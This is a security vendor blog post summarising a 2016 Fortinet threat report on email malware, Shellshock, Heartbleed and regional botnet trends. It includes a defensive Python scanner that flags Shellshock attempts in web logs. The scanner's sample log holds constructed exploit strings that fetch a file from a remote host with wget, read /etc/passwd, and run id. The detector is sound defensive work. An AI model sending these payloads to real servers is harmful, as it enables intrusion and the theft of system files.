Published just this week, the most recent report includes some interesting trends that every security professional ought to be reviewing in order to keep ahead of the ever-shifting threat landscape.
The Fortinet Cyber Threat Assessment Program (CTAP) recorded over 185 million threat events and incidents. Notably, in spite of an increased focus on security by many organizations, most of these attacks still slipped past traditional perimeter defenses and reached the internal network segments where the Fortinet assessment devices were deployed. Because those devices sit behind the existing perimeter, the data gives a more accurate picture of the kinds of threats and techniques that actually penetrate organizations, rather than of everything that is stopped at the edge. Much of that intelligence is reflected in this quarter's report.
Despite massive campaigns to get users not to click on email links or attachments from senders they don't know, email-based attacks continue to succeed. One of the most notable findings in this quarter's Fortinet CTAP Report is that email carrying infected attachments, or links leading to malicious content, remains the primary method of delivering malware to organizations. The next most common attack vector was malicious websites serving infected content reached through normal web browsing.
In spite of the high-profile growth of ransomware and newer, more sophisticated attacks, we continue to document a steady increase in the volume and velocity of attempted attacks delivered through email. This also means that far too many organizations have still failed to deploy, or properly configure, adequate email security countermeasures.
Attackers traditionally target unpatched devices, and that is not set to change anytime soon. In fact, the most frequently attempted exploit worldwide targeted the Bash (Bourne-Again Shell) vulnerability commonly referred to as Shellshock, which was uncovered in 2014. We also saw a large number of Heartbleed attacks aimed at the well-documented OpenSSL vulnerability disclosed the same year.
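Because Shellshock attempts arrive as ordinary HTTP requests, the quickest way to see whether your own hosts are being probed is to look for the bash function-definition prefix in web server access logs. The following is an added example written for this article, not Fortinet code or anything from the CTAP report: it parses combined-format log lines (constructed here for illustration, with RFC 5737 documentation addresses), checks the User-Agent, Referer and request fields for the `() {` prefix, and distinguishes a payload that would actually have fired on unpatched bash (the value starts with `() {`) from one that merely contains the token somewhere.

```python
"""Flag Shellshock (CVE-2014-6271) exploit attempts in web server access logs.

Added example for the Shellshock discussion above; not Fortinet code.
The log lines in SAMPLE_LOG are constructed, not real traffic.
"""
import re
from typing import Dict, List, Optional

# Vulnerable bash treated any exported variable whose value begins with
# "() {" as a function definition and kept executing commands placed after
# the closing brace. CGI servers export request headers (HTTP_USER_AGENT,
# HTTP_REFERER, ...) into the environment, which is how the payload reaches
# bash. One or more spaces between "()" and "{" is the trigger pattern.
SHELLSHOCK_RE = re.compile(r"\(\)\s+\{")

# Apache/nginx "combined" log format. Quoted fields may contain \" escapes.
_Q = r'"(?:[^"\\]|\\.)*"'
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] (?P<request>' + _Q + r') '
    r'(?P<status>\d{3}) (?P<size>\S+) (?P<referer>' + _Q + r') (?P<ua>' + _Q + r')'
)


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one combined-format line into fields; None if it does not parse."""
    m = LOG_RE.match(line.rstrip("\n"))
    if not m:
        return None
    rec = m.groupdict()
    for key in ("request", "referer", "ua"):
        rec[key] = rec[key][1:-1]  # strip the surrounding quotes
    return rec


def find_shellshock(line: str) -> Optional[Dict[str, str]]:
    """Return a hit record for the first field carrying a Shellshock pattern."""
    rec = parse_line(line)
    if rec is None:
        return None
    for field in ("ua", "referer", "request"):
        m = SHELLSHOCK_RE.search(rec[field])
        if m:
            return {
                "ip": rec["ip"],
                "ts": rec["ts"],
                "field": field,
                # Bash only parsed the value as a function when it *started*
                # with "() {"; a match elsewhere is worth logging but would
                # not have executed on an unpatched host.
                "verdict": "exploit" if m.start() == 0 else "suspicious",
                "payload": rec[field],
            }
    return None


def scan(lines: List[str]) -> List[Dict[str, str]]:
    """Run find_shellshock over a log and keep the lines that matched."""
    return [hit for hit in map(find_shellshock, lines) if hit]


# Constructed sample log (documentation IP ranges, invented payloads).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2016:13:55:36 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" '
    '"() { :; }; /bin/bash -c \'wget http://198.51.100.9/x -O /tmp/x\'"',
    '198.51.100.23 - - [10/Oct/2016:13:55:40 +0000] "GET /index.html HTTP/1.1" 200 2048 '
    '"http://www.example.com/" "Mozilla/5.0 (Windows NT 6.1)"',
    '192.0.2.44 - - [10/Oct/2016:13:56:01 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 404 0 '
    '"() { ignored;}; echo Content-Type: text/plain; echo; /bin/cat /etc/passwd" "curl/7.38.0"',
    '192.0.2.44 - - [10/Oct/2016:13:56:05 +0000] "GET /search HTTP/1.1" 200 100 '
    '"http://evil.example/?x=() { :;}; id" "Mozilla/5.0"',
    "garbage line that does not parse",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} {hit['verdict']:<10} {hit['field']}: {hit['payload']}")
```

Run it as a filter over a real access log (`python3 shellshock_scan.py < access.log` after swapping `SAMPLE_LOG` for `sys.stdin`) and treat any `exploit` verdict against a CGI path on a host that has not been patched as an incident, not a curiosity; the `suspicious` verdicts mostly come from scanners that embed the token in query strings and are useful for spotting who is probing you.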
A growing attack vector we are tracking is unpatched secondary vulnerabilities in the libraries and auxiliary components embedded in open systems. For some of these we recorded some of the highest numbers of attempted exploits we have seen, across many industries. The reason seems to be that attackers understand that patching a vulnerability in a library or auxiliary software is harder than patching the primary application, since the fix has to reach every product that bundles the component. So, far too often, it doesn't get done.
We also recorded a large number of attacks against commonly used open source platforms and services, such as OpenBSD and DNS. Additionally, attackers are enhancing these older attacks with new techniques designed to bypass perimeter security defenses and evade detection.
Interestingly, we documented that geographic regions each have their own unique challenges. North America had the most application vulnerability attacks, with more than 40,000 incidents per day. South America had the highest peer-to-peer application usage in the world, and the H-worm botnet was far and away the dominant malware detected there. In EMEA, the top challenge was the Conficker worm. Asia-Pacific leads all regions in malware and botnets detected, which may correlate with its also ranking first in malicious websites visited per day.
We have also documented that attackers are being more selective about the sorts of attacks they use depending on the market segment of the organization they have targeted.
This quarter’s report also provides some critical guidance on what to do about the threats we have documented. They include:
The quarterly threat landscape report provides a wealth of timely threat analysis and security intelligence. Combined with Fortinet's weekly Threat Intelligence Brief, available by subscription, it provides essential information to help keep today's security professionals apprised of the latest threats targeting their networks.
You can download a copy of the 2016 Fortinet CTAP Report here.